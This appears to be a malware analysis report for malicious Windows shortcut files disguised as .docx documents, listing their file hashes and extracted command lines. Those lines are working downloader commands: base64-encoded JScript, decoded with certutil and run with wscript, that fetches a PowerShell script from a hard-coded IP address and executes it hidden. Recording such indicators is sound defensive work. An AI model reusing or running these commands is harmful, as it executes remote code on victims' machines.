| Hash | Hash Value |
|---|---|
| MD5 | 4e90cc212b68d5f1e3afe4e6c3a96090 |
| Sha1 | eb801408c86faf594a6aab2ad651a22ef1374988 |
| Sha256 | b4c56effba0516161bf59022f137837ccf852825e5fa09d15b9a8bf8295fbde2 |
| Sha384 | 0e7419d46d083f4652f04e61e45bc4bdcfdd5e71371c2e4c6bbe0214d6b87cacfa95f4a4a7b349fb759464b4f6f8e8d9 |
| Sha512 | c830cee99cad715d7c275bfc4498f594eb41e662860c1e2e2d2fb30fccb9a8706cad7215b07c44bd6b97551be24aed660e13c27363dd0653be9e3e8e6ad3691a |
| SSDeep | 48:M7PqcanNnty7KEu+njtzCM7PqHan6JHHmtu9lcBXuz/B7o/007DX:M7icyNr+njpX7iHy6JHqa7c7z |
| TLSH | E152CF3071F9211CE5F3FF71ACA466C6DEABF9B3BA7112694542160A0A01E40ED25B3B |

| Name | Value |
|---|---|
| LNK: Command Execution | cmd.exe /c "cd /d %TEMP% && echo dmFyIGg9bmV3IEFjdGl2ZVhPYmplY3QoIk1TWE1MMi5TZXJ2ZXJYTUxIVFRQLjYuMCIpO2gub3BlbigiR0VUIiwiaHR0cDovLzE5My4xNjkuMTk0Ljg2L2NyNDRnL3Nwb25zb3JpbnB1dC5wczEiLGZhbHNlKTtoLnNldFJlcXVlc3RIZWFkZXIoIlVzZXItQWdlbnQiLCJVQSBXaW5kb3dzUG93ZXJTaGVsbCIpO2guc2VuZCgpO25ldyBBY3RpdmVYT2JqZWN0KCJTaGVsbC5BcHBsaWNhdGlvbiIpLlNoZWxsRXhlY3V0ZSgicG93ZXJzaGVsbC5leGUiLCItTm9QIC1XIEhpZGRlbiAtQyAiK2gucmVzcG9uc2VUZXh0LCIiLCJvcGVuIiwwKTs= > bCP.b64 && certutil -decode bCP.b64 PoIQJ.js >nul && wscript //b PoIQJ.js && del bCP.b64 PoIQJ.js" |
| LNK: Command Execution | cmd.exe /c "cd /d %TEMP% && echo dmFyIGg9bmV3IEFjdGl2ZVhPYmplY3QoIk1TWE1MMi5TZXJ2ZXJYTUxIVFRQLjYuMCIpO2gub3BlbigiR0VUIiwiaHR0cDovLzE5My4xNjkuMTk0Ljg2L2NyNDRnL2ZpZnRoYmVsb25nLnBzMSIsZmFsc2UpO2guc2V0UmVxdWVzdEhlYWRlcigiVXNlci1BZ2VudCIsIlVBIFdpbmRvd3NQb3dlclNoZWxsIik7aC5zZW5kKCk7bmV3IEFjdGl2ZVhPYmplY3QoIlNoZWxsLkFwcGxpY2F0aW9uIikuU2hlbGxFeGVjdXRlKCJwb3dlcnNoZWxsLmV4ZSIsIi1Ob1AgLVcgSGlkZGVuIC1DICIraC5yZXNwb25zZVRleHQsIiIsIm9wZW4iLDApOw== > yO.b64 && certutil -decode yO.b64 5G9X2.js >nul && wscript //b 5G9X2.js && del yO.b64 5G9X2.js" |

| Name | Value | Location |
|---|---|---|
| LNK: Command Execution | cmd.exe /c "cd /d %TEMP% && echo dmFyIGg9bmV3IEFjdGl2ZVhPYmplY3QoIk1TWE1MMi5TZXJ2ZXJYTUxIVFRQLjYuMCIpO2gub3BlbigiR0VUIiwiaHR0cDovLzE5My4xNjkuMTk0Ljg2L2NyNDRnL3Nwb25zb3JpbnB1dC5wczEiLGZhbHNlKTtoLnNldFJlcXVlc3RIZWFkZXIoIlVzZXItQWdlbnQiLCJVQSBXaW5kb3dzUG93ZXJTaGVsbCIpO2guc2VuZCgpO25ldyBBY3RpdmVYT2JqZWN0KCJTaGVsbC5BcHBsaWNhdGlvbiIpLlNoZWxsRXhlY3V0ZSgicG93ZXJzaGVsbC5leGUiLCItTm9QIC1XIEhpZGRlbiAtQyAiK2gucmVzcG9uc2VUZXh0LCIiLCJvcGVuIiwwKTs= > bCP.b64 && certutil -decode bCP.b64 PoIQJ.js >nul && wscript //b PoIQJ.js && del bCP.b64 PoIQJ.js" Malicious | 4e90cc212b68d5f1e3afe4e6c3a96090 > SPYSOK_mayna.docx.lnk |
| LNK: Command Execution | cmd.exe /c "cd /d %TEMP% && echo dmFyIGg9bmV3IEFjdGl2ZVhPYmplY3QoIk1TWE1MMi5TZXJ2ZXJYTUxIVFRQLjYuMCIpO2gub3BlbigiR0VUIiwiaHR0cDovLzE5My4xNjkuMTk0Ljg2L2NyNDRnL2ZpZnRoYmVsb25nLnBzMSIsZmFsc2UpO2guc2V0UmVxdWVzdEhlYWRlcigiVXNlci1BZ2VudCIsIlVBIFdpbmRvd3NQb3dlclNoZWxsIik7aC5zZW5kKCk7bmV3IEFjdGl2ZVhPYmplY3QoIlNoZWxsLkFwcGxpY2F0aW9uIikuU2hlbGxFeGVjdXRlKCJwb3dlcnNoZWxsLmV4ZSIsIi1Ob1AgLVcgSGlkZGVuIC1DICIraC5yZXNwb25zZVRleHQsIiIsIm9wZW4iLDApOw== > yO.b64 && certutil -decode yO.b64 5G9X2.js >nul && wscript //b 5G9X2.js && del yO.b64 5G9X2.js" Malicious | 4e90cc212b68d5f1e3afe4e6c3a96090 > NAKAZ_MO_perevirka_mayna.docx.lnk |